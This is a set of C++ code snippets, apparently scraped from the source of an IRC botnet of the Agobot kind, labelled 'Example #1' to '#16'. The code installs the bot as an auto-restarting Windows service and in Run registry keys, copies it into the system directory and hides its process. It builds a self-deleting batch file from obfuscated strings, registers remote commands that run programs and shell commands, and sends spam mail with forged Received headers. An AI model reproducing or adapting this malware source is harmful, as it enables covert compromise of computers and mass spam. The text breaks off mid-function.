Example #1
0
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
	SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(),
		g_pMainCtrl->m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
		sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			ServiceDel(sServicename); CloseServiceHandle(hService);
			CloseServiceHandle(hServiceControl);
			return ServiceAdd(sServicename, sFilename);
		} else {
			CloseServiceHandle(hServiceControl); return false; }
	}

	SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
	SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL;
	sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;

	if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
		CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false;
	}

	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true;
}
Example #2
0
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; sSvcParams.Format("-service");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); }
Example #3
0
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) 
{
	CString sysdir; 
	GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; 
	sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; 
	sSvcParams.Format("-netsvcs");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); 
}
Example #4
0
bool CInstaller::RegStartDel(CString &sValuename) {
	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	return true; }
Example #5
0
bool CInstaller::RegStartAdd(CString &sValuename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key);

	return true; }
Example #6
0
bool CSMTP_Connection::Connect(CString sHost, int iPort) {
	// Fail if already connected
	if(m_sServerSocket.IsConnected() || m_bConnected) return false;

	// Connect to the server
	if(!m_sServerSocket.Connect(sHost.CStr(), iPort)) {
		// Connection failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Failed to connect to \"%s:%d\"!\n", this,
			sHost.CStr(), iPort);
#endif // DBGCONSOLE
		return false;
	}

	// Store server address in member variables
	m_sServerHost.Assign(sHost); m_iServerPort=iPort;

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Connected to \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Receive banner
	CString sRecvBuf;
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if connection was accepted
	if(sRecvBuf.Mid(0, 3).Compare("220")) {
		// Connection not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected connection!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Set connection status to true and return true
	m_bConnected=true; return true;
}
Example #7
0
int GetCopies(CString &sFilename)
{
#ifdef WIN32
	char cFilename[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cFilename, sizeof(cFilename));
	if(fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next)
	{	psnap=fCreateToolhelp32Snapshot(2, 0);
		if(psnap!=INVALID_HANDLE_VALUE)
		{	int copies=0; pe32.dwSize=sizeof(PROCESSENTRY32);
			if(fProcess32First(psnap, &pe32))
			{	do {	if((strncmp(cFilename+(strlen(cFilename)-strlen(pe32.szExeFile)), \
						pe32.szExeFile, strlen(pe32.szExeFile))==0) || \
						(strncmp(sFilename, pe32.szExeFile, strlen(pe32.szExeFile))==0))
							copies++;
				} while(fProcess32Next(psnap, &pe32)); }
			CloseHandle(psnap);
			return copies; }
		else return 0; }
	else return 0;
#else
	char szCmdBuf[4096]; sprintf(szCmdBuf, "ps ax | grep %s | grep -v grep > psaxtemp", sFilename.CStr());
	system(szCmdBuf); FILE *fp=fopen("psaxtemp", "r"); if(!fp) return 0;
	fseek(fp, 0, SEEK_END); long lFileSize=ftell(fp); fseek(fp, 0, SEEK_SET);
	if(lFileSize>0) return 1;
	fclose(fp); system("rm -f psaxtemp"); return 0;
#endif // WIN32
}
Example #8
0
bool CInstaller::Uninstall()
{
#ifdef WIN32
	HANDLE f; DWORD r;
	PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
	char cmdline[MAX_PATH]; char tcmdline[MAX_PATH]; char cfilename[MAX_PATH];
	char batfile[MAX_PATH]; char tempdir[MAX_PATH];

	GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
	GetTempPath(sizeof(tempdir), tempdir);

	sprintf(batfile, "%s\\%s", tempdir, dp(1,6,18,15,79,2,1,20,0).CStr());
	f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
	if (f > (HANDLE)0) {
		// write a batch file to remove our executable once we close
			/*WriteFile(f, "@echo off\r\n"
					 ":start\r\nif not exist \"\"%1\"\" goto done\r\n"
					 "del /F \"\"%1\"\"\r\n"
					 "del \"\"%1\"\"\r\n"
					 "goto start\r\n"
					 ":done\r\n"
					 "del /F %temp%\r.bat\r\n"
					 "del %temp%\r.bat\r\n", 105, &r, NULL);*/
			CString sBat;
			sBat.Format("%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n",
			dp(86,5,3,8,15,78,15,6,6,0).CStr(),	// @echo off
			dp(83,19,20,1,18,20,0).CStr(),		// :start
			// if not exist ""%1"" goto done
			dp(9,6,78,14,15,20,78,5,24,9,19,20,78,84,84,57,69,84,84,78,7,15,20,15,78,4,15,14,5,0).CStr(),
			dp(4,5,12,78,82,32,78,84,84,57,69,84,84,0).CStr(),	// del /F ""%1""
			dp(4,5,12,78,84,84,57,69,84,84,0).CStr(),			// del ""%1""
			dp(7,15,20,15,78,19,20,1,18,20,0).CStr(),			// goto start
			dp(83,4,15,14,5,0).CStr(),							// :done
			dp(4,5,12,78,82,32,78,57,20,5,13,16,57,0).CStr(),	// del /F %temp%
			dp(79,2,1,20,0).CStr(),								// .bat
			dp(4,5,12,78,57,20,5,13,16,57,0).CStr(),			// del %temp%
			dp(79,2,1,20,0).CStr());							// .bat

		WriteFile(f, sBat.CStr(), 105, &r, NULL);

		CloseHandle(f);

		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo);
		sinfo.wShowWindow = SW_HIDE;

		GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));// get our file name
		sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, cfilename); // build command line
		ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

		// execute the batch file
		CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
	}
#else
	// Linux
#endif // WIN32
	return true;
}
Example #9
0
bool CInstaller::IsInstalled(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
Example #10
0
bool CInstaller::ServiceDel(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
	DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
Example #11
0
void CBot::Init()
{	init_random();
	CString sTemp;		sTemp.Format("%d", brandom(500, 22226));
	CString sTempFTP;	sTempFTP.Format("%d", brandom(500, 22226));

	REGCVAR(bot_ftrans_port,		sTemp.CStr(),		"Bot - File Transfer Port",			false,	false,	0	);
	REGCVAR(bot_ftrans_port_ftp,	sTempFTP.CStr(),	"Bot - File Transfer Port for FTP",	false,	false,	0	);
	REGCVAR(si_chanpass,			"",					"Server Info - Channel Password",	false,	false,	0	);
	REGCVAR(si_mainchan,			"",					"Server Info - Main Channel",		false,	false,	0	);
	REGCVAR(si_nickprefix,			"",					"Server Info - Nickname prefix",	false,	false,	0	);
	REGCVAR(si_port,				"",					"Server Info - Server Port",		false,	false,	0	);
	REGCVAR(si_server,				"",					"Server Info - Server Address",		false,	false,	0	);
	REGCVAR(si_servpass,			"",					"Server Info - Server Password",	false,	false,	0	);
	REGCVAR(si_usessl,				"",					"Server Info - Use SSL ?",			false,	false,	0	);

	Config();

	REGCMD(m_cmdAbout,			"bot.about",		"displays the info the author wants you to see",	false,	this);
	REGCMD(m_cmdDie,			"bot.die",			"terminates the bot",								false,	this);
	REGCMD(m_cmdDns,			"bot.dns",			"resolves ip/hostname by dns",						false,	this);
	REGCMD(m_cmdExecute,		"bot.execute",		"makes the bot execute a .exe",						false,	this);
	REGCMD(m_cmdId,				"bot.id",			"displays the id of the current code",				false,	this);
	REGCMD(m_cmdNick,			"bot.nick",			"changes the nickname of the bot",					false,	this);
	REGCMD(m_cmdOpen,			"bot.open",			"opens a file (whatever)",							false,	this);
	REGCMD(m_cmdRemove,			"bot.remove",		"removes the bot",									false,	this);
	REGCMD(m_cmdRemoveAllBut,	"bot.removeallbut",	"removes the bot if id does not match",				false,	this);
	REGCMD(m_cmdRndNick,		"bot.rndnick",		"makes the bot generate a new random nick",			false,	this);
	REGCMD(m_cmdStatus,			"bot.status",		"gives status",										false,	this);
	REGCMD(m_cmdSysInfo,		"bot.sysinfo",		"displays the system info",							false,	this);
	REGCMD(m_cmdLongUptime,		"bot.longuptime",	"If uptime > 7 days then bot will respond",			false,	this);
	REGCMD(m_cmdQuit,			"bot.quit",			"quits the bot",									false,	this);
	REGCMD(m_cmdFlushDNS,		"bot.flushdns",		"flushes the bots dns cache",						false,	this);
	REGCMD(m_cmdSecure,			"bot.secure",		"delete shares / disable dcom",						false,	this);
	REGCMD(m_cmdUnSecure,		"bot.unsecure",		"enable shares / enable dcom",						false,	this);
	REGCMD(m_cmdCommand,		"bot.command",		"runs a command with system()",						false,	this);

	CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
	g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
	m_lStartTime=(unsigned long)GetTickCount()/1000;
}
Example #12
0
bool CInstaller::ServiceStart(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	StartService(hService, 0, NULL);
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); 

/*	CString sCmdBuf; sCmdBuf.Format("net start %s", sServicename.CStr());
	system(sCmdBuf.CStr());*/

	return true;
}
Example #13
0
bool CSMTP_Connection::Disconnect() {
	// Fail if not connected
	if(!m_sServerSocket.IsConnected()) return false;

	// Send QUIT command
	CString sReqBuf; sReqBuf.Format("QUIT\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Disconnecting from \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Close socket and reset variables
	m_sServerSocket.Disconnect();
	m_sServerHost.Assign(""); m_iServerPort=0; m_bConnected=false;
	return true;
}
Example #14
0
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, 
							CString sRcptTo, CString sSubject, CString sData) {
	CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS;

	init_random();

	m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL);

	switch(brandom(1,5)) {
	case 1:
		sOS.Assign("Debian"); break;
	case 2:
		sOS.Assign("RedHat"); break;
	case 3:
		sOS.Assign("SuSE"); break;
	case 4:
		sOS.Assign("Slackware"); break;
	case 5:
		sOS.Assign("FreeBSD"); break;
	default:
		sOS.Assign("Unknown"); break; }

	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40));

			sMTA.Format("SMTP %s.%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_EXIM:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5));

			sMTA.Format("Exim %s.%s #%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_SENDMAIL:
		{	CString sVersionHigh, sVersionLow, sVersionLow2;
			sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10));
			sVersionLow2.Assign(brandom(1, 10));

			sMTA.Format("8.%s.%s/8.%s.%s",
				sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); }
		break;
	case MTA_TYPE_QMAIL:
		{	CString sPid; sPid.Assign(brandom(1, 65000));
			CString sInvokedBy; int iInvokedBy=brandom(1,3);
			if(iInvokedBy==1) {
				sInvokedBy.Assign("alias");
			} else if(iInvokedBy==2) {
				sInvokedBy.Assign("network");
			} else if(iInvokedBy==3) {
				sInvokedBy.Assign("uid 0");
			}

			sMTA.Format("qmail %s invoked by %s",
				sPid.CStr(), sInvokedBy.CStr()); }
		break;
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	default:
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Invalid MTA type selected!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		break; }

	// Generate an ID
	CString sID=GenerateID(); sSrcID.Assign(sID);

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());

	// Send MAIL FROM command
	sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// MAIL FROM failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this,
			sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send RCPT TO command
	sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// RCPT TO failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected RCTP TO \"%s\" (\"%s\")!\n", this,
			sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send DATA command
	sReqBuf.Format("DATA\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("354")) {
		// DATA failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected DATA (\"%s\")!\n", this,
			sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Get local time
	time_t tGlobal=time(NULL); char szTimeBuf[4096];
	strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal));

	// Clear buffer
	sReqBuf.Assign("");
	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <xxxx@xxxx.xxxx.xxx.xxx>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <E1AOkjD-0001RE-00@xxxxx.xxxxxxx.xxx>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_EXIM:
			// Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian))
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <xxxx@xxxx.xxxx.xxx.xxx>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <E1AOkjD-0001RE-00@xxxxx.xxxxxxx.xxx>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_SENDMAIL:
			// Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <xxxx@xxxx.xxxx.xxx.xxx>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <E1AOkjD-0001RE-00@xxxxx.xxxxxxx.xxx>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_QMAIL:
			// Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000
			sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); ");
			sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
		break;
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	}

	// From: xxxx <xxxx@xxx.xxxx.xxx.xxx>
	sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <");
	sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n");
	// To: xxxx@xxxx.xxxx.xxx.xxx
	sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n");
	// Subject: bla
	sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n");
	// Date: Tue, 25 Nov 2003 22:28:12 +0100
	sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
	// MIME-Version: 1.0
	sReqBuf.Append("MIME-Version: 1.0\r\n");
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		// Content-Type: text/html; charset=us-ascii
		sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
//	} else {
//		// Content-Type: text/plain; charset=us-ascii
//		sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n");
//	}
	sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
	// Content-Transfer-Encoding: 7bit
	sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n");
	// 
	// <data>
	// .
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		sReqBuf.Append("\r\n\r\n");
//	} else {
//		sReqBuf.Append("\r\n");
//	}
	sReqBuf.Append("\r\n\r\n");
	sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n");

	// Send data
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if data was accepted
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// Data not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this,
			sMailFrom.CStr(), sRcptTo.CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	return true;
}
Example #15
0
bool CSMTP_Connection::Hello() {
	CString sReqBuf; CString sRecvBuf; CString sHost;

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());
	
	// Send EHLO command
	sReqBuf.Format("EHLO %s\r\n", sHost.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if EHLO was accepted
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// EHLO not accepted, try HELO (no ESMTP)
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected EHLO, disabling SMTP extensions!\n", this);
#endif // DBGCONSOLE

		// Send HELO command
		sReqBuf.Format("HELO %s\r\n", sHost.CStr());
		m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

		// Receive reply
		if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
			// Connection reset
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Connection reset!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// Check if HELO was accepted
		if(sRecvBuf.Mid(0, 3).Compare("250")) {
			// HELO not accepted
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Server rejected HELO!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// HELO accepted, disable ESMTP and return true
		m_bUseSMTPExt=false; return true;
	}

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
		"Enabled SMTP extensions!\n", this);
#endif // DBGCONSOLE

	// EHLO accepted, enable ESMTP and return true
	m_bUseSMTPExt=true; return true;
}
Example #16
0
bool CInstaller::CopyToSysDir(CString &sFilename)
{
	char tstr[MAX_PATH];
#ifdef WIN32
	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	m_sSysDir.Assign(sysdir.CStr());
	CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH);

	HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll");
	if(kernel32_dll)
	{	fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
		fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot");
		fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First");
		fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next");
		if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); }
#else
	m_sSysDir.Assign("/usr/sbin");
	CString sysdir(m_sSysDir);
	CString cfilename(g_cMainCtrl.m_sArgv0);
#endif // WIN32


/*	#ifdef DBGCONSOLE
		g_cMainCtrl.m_cConsDbg.Log(5, "Checking for multiple copies...\n");
	#endif // DBGCONSOLE
	if(!g_cMainCtrl.m_cCmdLine.m_cConfig.bUpdate && !g_cMainCtrl.m_cCmdLine.m_cConfig.bService)
	{
